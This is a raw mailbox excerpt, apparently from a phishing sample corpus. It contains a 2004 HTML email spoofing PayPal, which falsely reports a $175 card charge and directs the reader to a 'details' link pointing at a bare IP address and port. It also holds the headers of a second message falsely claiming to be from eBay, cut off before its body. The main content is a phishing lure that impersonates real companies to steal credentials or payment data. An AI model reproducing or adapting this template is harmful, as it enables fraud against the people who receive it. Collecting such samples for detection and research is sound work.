From: exchange-robot@paypal.com
To: username@domain.com
Subject: Confirmation
Date: Fri, 3 Dec 2004 00:30:28 +0900
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0004_01C4D8CF.4A347C00"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1081
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 30

This is a multi-part message in MIME format.

------=_NextPart_000_0004_01C4D8CF.4A347C00
Content-Type: text/html;
	charset="iso-8859-2
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
 <meta http-equiv="content-type"
 content="text/html; charset=windows-1251">
</head>
<body text="#000000" bgcolor="#ffffcc" link="#000099"
 vlink="#990099"
 alink="#000099">

<p><i>Congratulations! PayPal has successfully charged $175 to your credit
card. Your order tracking number is A866DEC0, and your item will be shipped
within three business days. </i></p>
<p><i>To see details please click this <a href=3D"http://220.72.90.116:1639/index.htm"><b>link</b></a>.
</i></p>
<p><i>DO NOT REPLY TO THIS MESSAGE VIA EMAIL! This email is being sent by
an automated message system and the reply will not be received. </i></p>

<p><i>Thank you for using PayPal.</i></p>
</body>
</html>





------=_NextPart_000_0004_01C4D8CF.4A347C00--


From aw-confirm@ebay.com  Sun Dec  5 18:01:05 2004
Return-Path: <aw-confirm@ebay.com>
X-Original-To: username@domain.com
Delivered-To: username@domain.com
Received: from mail2.domain.com (mail2.domain.com [192.168.64.8])
	by spanky.domain.com (Postfix) with ESMTP id 83662538C76
	for <username@domain.com>; Sun,  5 Dec 2004 18:01:04 -0500 (EST)
Received: from sac1 (unknown [66.235.201.125])
	by mail2.domain.com (Postfix) with ESMTP id 71A271A7CCD
	for <username@domain.com>; Fri,  3 Dec 2004 04:26:15 -0500 (EST)
